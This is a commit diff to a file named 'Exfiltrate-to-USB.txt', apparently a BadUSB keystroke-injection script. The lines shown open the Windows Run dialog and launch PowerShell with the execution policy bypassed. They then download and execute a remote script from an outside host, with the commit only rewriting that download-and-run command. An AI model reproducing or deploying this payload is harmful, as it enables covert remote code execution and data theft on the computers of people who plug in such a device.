Update Exfiltrate-to-USB.txt

This commit is contained in:
egieb
2025-06-18 15:08:59 +00:00
committed by GitHub
parent 9aa915250a
commit 53fb988ba5

View File

@@ -15,6 +15,6 @@ REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://bw0.cc/exusb | iex
STRING powershell -Ep Bypass -C $driveName = ''; $Hidden = ''; iex (irm bw0.cc/exusb)
ENTER